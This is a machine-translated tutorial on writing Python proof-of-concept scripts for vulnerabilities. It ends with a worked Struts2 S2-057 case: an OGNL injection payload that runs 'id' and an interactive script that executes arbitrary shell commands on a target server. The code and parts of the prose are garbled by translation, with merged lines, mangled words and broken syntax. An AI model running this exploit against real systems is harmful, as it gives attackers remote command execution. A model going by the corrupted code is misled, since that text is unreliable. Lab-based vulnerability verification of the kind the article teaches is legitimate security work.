Shulou(Shulou.com)06/01 Report--

This article mainly explains "how to use Poc verification program vulnerabilities in Python". The explanation content in the article is simple and clear, easy to learn and understand. Please follow the editor's train of thought to study and learn "how to use Poc verification program vulnerabilities in Python".

01 what is poc

PoC (full name: Proof of Concept), translated into Chinese for proof of concept. In the security world, you can understand it as a vulnerability verifier. Compared with some applications, PoC is an incomplete program, just a piece of code to prove the point of the presenter.

02 what is EXP

Exp (full name: Exploit) is called * * vulnerability exploiting program in Chinese. * * is a program that can exert the value of vulnerabilities. Imagine a scenario where the target has a SQL injection vulnerability, and then you know it, and then you write a program, through this SQL injection vulnerability, to get the permissions of the target, then this program is the so-called Exp, of course, if you don't use this vulnerability, it just leaves it, then this vulnerability can be considered worthless to you.

03 two misunderstandings about PoC/Exp

1. Write PoC to meet Python? PoC exists for only one purpose: to prove the existence of vulnerabilities. As for the form of PoC, or the way the code is implemented, you can use whatever language you like. Writing in Python is recommended because Python is easy to write and easy to read.

2. PoC is Exp? Strictly speaking, PoC and Exp are two different things. PoC is used to prove the existence of vulnerabilities, and Exp is used to use this vulnerability to further attack, in many cases, know the existence of vulnerabilities, but do not know how to use them, it is very easy to write a PoC, but it is difficult to write an Exp.

Take a chestnut:

Poc is like a problem with your door lock, which others know but does not break, while Exp knows that there is something wrong with your door lock and makes further use of it to commit illegal acts such as theft.

04 PoC authoring process

For a known public vulnerability, the writing process is roughly divided into the following steps:

Check the details of the vulnerability to determine the scope of impact. After obtaining the details of a vulnerability, you can download the affected version through the official website, or look for existing docker files on github.

Build a vulnerability environment through virtual machines, docker, and phpstudy. Students with conditions can build it on the cloud. (it is recommended to use docker to build it. Some errors will occur in the building environment and unnecessary time will be wasted. The existing docker is a docker file written by bosses after reproducing the vulnerability.)

Repeat the loophole according to the details of the loophole, follow the process to detect the existence of the loophole, in which you should pay special attention to some parameters, commands, functions and corresponding submission methods. Probably understand the principle of the loophole, the exploitation process, and determine whether the loophole exists.

Write Poc after the vulnerability is reproduced, start writing Poc so that you can write a simple request to check if the vulnerability exists, and then filter the page request through regular or lxml to get the desired results.

Test Poc tests the written Poc through the built environment, verifies the existence of vulnerabilities during writing, and tests every modification to achieve the desired effect.

05 some libraries involved in the writing of Poc

Urllib provides a module for operating URL, which is often needed when crawling web pages.

Urllib.request-- opening and reading urlurllib.error-- contains the exception thrown by urllib.request. Urllib.parse-parses URL.

The easy-to-use HTTP library implemented by requests is more concise than urllib

Requests.get (url,headers,data,verify=False,proxies=proxy,timeout=10) url-- urlheaders of the request-- request header data constructed during the request-- data verify brought in during the request-- canceling https alarm proxies-- proxy setting timeout-- request response timeout processing

Re regular expression module, which uses concise character expressions to match the desired results in the string

Using the regular syntax, it is recommended to copy the request source code to the online regular matching website for regular syntax construction.

Regular online testing: https://www.yisu.com/tools/zhengze.htm

Json processes Python data into json format or json data into Python data format

Two methods: json.dumps encodes Python objects into JSON strings json.loads decodes encoded JSON strings into Python objects

Parsers for lxml XML and HTML, whose main functions are to parse and extract data from XML and HTML, and to locate information about specific elements and nodes.

The lxml location element node involves the XPath syntax from lxml import etreehtml = etree.HTML (response.text) result = html.xpath ('xpath statement') print (result)

Optparse command line parameter module, some parameters such as-h (--hlep) and-u (--url) are often seen in Poc. This module is used.

Parser = optparse.OptionParser () # after importing the OptionParser object, you can use add_optionparse.add_option ('- ubiquitous pencils, murmurys, usernames, and destinations, usernames, etc.) # add the required parameters and content parse.set_defaults (vault 1.2) # you can also set the default value options,args=parse.parse_args ()

Base64 encrypts and decrypts strings with base64

Base64.b64encode ()-- Encoding function base64.b64decode ()-- Decoding function

Multiprocessing multiple processes, which can be used to reduce processing time when dealing with requests with a large amount of data. (the multithreading of Pyhton is fake, not concurrent but serial.)

From multiprocessing import Processdef Poc (): xxxx....if _ _ name = ='_ _ main__': for i in rangge (5): thread = Process (target=Poc Args=str (I) thread.start () Thread.join () 06 Web vulnerability Poc Writing basic method import requestsimport refrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef Poc (url): target_url = url + 'payload' # verify vulnerable url# proxy pool settings proxy = {' http':'127.0.0.1:812' 'http':'127.0.0.1:8123'} # request header construction headers = {' User-Agent':'Mozilla/5.0 (Windows NT 10.0) Win64 X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36', # simulate browser request 'cookie':'xxxxxxxxxxxxxx', # some requests require cookie to request the desired content' Connection':'close' # close redundant connection requests} data = {'name':'xxxx' 'value':'xxxx'} # bring the requested data into url # use try except to handle exceptions try: requests.packages.urllib3.disable_warnings (InsecureRequestWarning) # cancel SSL authentication alarm response = requests.get (url=target_url,headers=headers,data=data,verify=False,proxies=proxy,timeout=10) # request vulnerability url if response.status_code = = 200: result = re.search (ringing vulnerability' Response.text,re.I) # using regular matching page requests Fill in the regular rules print ('getting results: {}' .format (result.group (1) else: print ('request failed: {}' .format (response.status_code)) except Exception as e: print ('request failed: {}' .format (e)) if _ _ name__ = ='_ _ main__': url = str (input ('Please enter the detected url:')) Poc (url) 07 practical vulnerability Poc

Here Struts2 S2-057 vulnerability is used to test vulnerability deployment using docker

Startup environment: docker-compose up-d

Visit: http://192.168.11.124:8080/struts2-showcase/

First of all, reproduce the loophole, understand the loophole repeat every step.

Conduct poc writing tests to verify the existence of vulnerabilities:

Poc:/struts2-showcase/$%7B233*233%7D/actionChain1.action

Http://192.168.11.124:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action

After accessing the connection, the $% 7B233*233%7D in the connection is resolved to 54289 (233% 233), indicating a vulnerability.

It can then be verified again based on the existing vulnerability Poc (exp).

Note: the poc here needs to be url encoded.

Poc (exp): ${(# dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (# ct=#request ['struts.valueStack'] .context). (# cr=#ct [' com.opensymphony.xwork2.ActionContext.container']). (# ou=#cr.getInstance (@ com.opensymphony.xwork2.ognl.OgnlUtil@class)). (# ou.getExcludedPackageNames (). Clear ()). (# ou.getExcludedClasses (). Clear ()). (# ct.setMemberAccess (# dm)) A=@java.lang.Runtime@getRuntime () .exec ('id'). (@ org.apache.commons.io.IOUtils@toString (# a.getInputStream ()}

The recurrence of vulnerabilities is basically complete, and now we are writing Poc.

Import requests import sys def title (): print ('+ -') print ('Version:Struts S2-057') print (' author:Tackrio') print ('use:exploit.py url ') print (' + -') def Poc (url): try: while True: cmd = input ('$') payload_command ='/ struts2/%24%7B (% 23dm% 3D% 40ognl.OgnlContext% 40DEFAULT_MEMBER_ACCESS). (% 23ct%3D%23request%5B%27struts.valueStack%27%5D.context). (% 23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D). (% 23ou%3D%23cr.getInstance (% 40com.opensymphony.xwork2.ognl.OgnlUtil%40class)). (% 23ou.getExcludedPackageNames (). Clear ()). (% 23ou.getExcludedClasses (). Clear ()). (% 23ct.setMemberAccess (% 23dm)). (% 23a%3D % 40java.lang.Runtime%40getRuntime () .exec (% 27'+cmd+'%27). (% 40org.apache.commons.io.IOUtils%40toString (% 23a.getInputStream () 7D ActionChain1.action' payload_test ='/ struts2-showcase/$%7B1+1%7D/actionChain1.action' response_test = requests.get (url=url + payload_test) Allow_redirects=False,verify=False,timeout=6) content = response_test.headers.get ('Location'). Split (' /') [2] if cmd = = 'exit': exit () if response_test.status_code = = 302 and content = =' 2 and content: url1 = url + payload_command response = requests.get (url=url1,allow_redirects=False,verify=False Timeout=6) print (response.headers.get ('Location'). Split (' /') [2]) except requests.ConnectionError as error: print ("request error:", error) if _ _ name__ = "_ _ main__": title () args = sys.argv [1] Poc (url=args)

Thank you for your reading, the above is the content of "how to use Poc verification program vulnerabilities in Python". After the study of this article, I believe you have a deeper understanding of how to use Poc verification program vulnerabilities in Python, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.